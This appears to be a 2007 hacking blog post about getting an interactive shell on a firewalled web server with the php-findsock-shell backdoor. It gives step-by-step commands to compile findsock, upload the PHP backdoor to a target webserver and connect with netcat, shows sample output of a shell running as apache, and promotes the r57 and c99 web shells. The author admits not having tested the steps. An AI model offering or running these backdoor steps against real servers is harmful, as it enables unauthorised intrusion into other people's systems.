Creating a reverse shell on a non-firewalled server , won’t be a problem when you use php shells such as r57 or c99. R57 and c99 will simply create a reverse shell / bind shell by just clicking on their options and while your box is already listening to a specific port. There you’d receive a reverse shell on your own box ,and you’re ready to go! . But what if our target’s firewalled , and the reverse shell method completely being impossible to do? How to create a reverse shell on a Firewalled target server ?
Well, i’ve found this tool, called php-findsock-shell on pentestmonkey’s web. This is the only one tool you’ll need when you wanna create a reverse shell on a firewalled server! Here are some steps that i (actually) haven’t tried it out by myself 
, but it should work man 
:
- Download the php-findsock-shell here.
- Compile findsock.c : gcc -o findsock findsock.c
- Upload the compiled findsock , and the script php-findsock-shell.php somewhere in the webserver.
- Accessing php-findsock-shell.php through netcat , and enjoy your reverse shell! :
$ nc -v target 80
target [10.0.0.1] 80 (http) open
GET /php-findsock-shell.php HTTP/1.0
sh-3.2$ id
uid=80(apache) gid=80(apache) groups=80(apache)
sh-3.2$
… you now have an interactive shell! 
Enjoy ! , further details can be found here.
php-findsock-shell : another interesting web backdoor is posted on October 2nd, 2007 by admin. This post is filed under: Sectools, Security, Hacking, how to, php shells, Security, tutorials, web backdoors, Web Hacking .
Some people come to this post with this search term: r57 download shell, c99 backdoor, shell r57, backdoor c99, r57 shell, download shell c99, r57 php shell, backdoor php c99, findsock, php shell r57, friendster backdoor, c99 shell download, r57 backdoor, c99 shell tutorial, c99 backdoor php, r57 shell.php, c99 tutorial, shell, php reverse shell, shell.php download,
And here is the related entries of this post:
[...] [via] Related PostsPHP to PDF with Oracle DatabasePHP Designer 2007 - Professional 5.3.1PHP connection to OracleFound anotherthing interesting.. “The Dark Game?Found anotherthing interesting.. “The Dark Game†[...]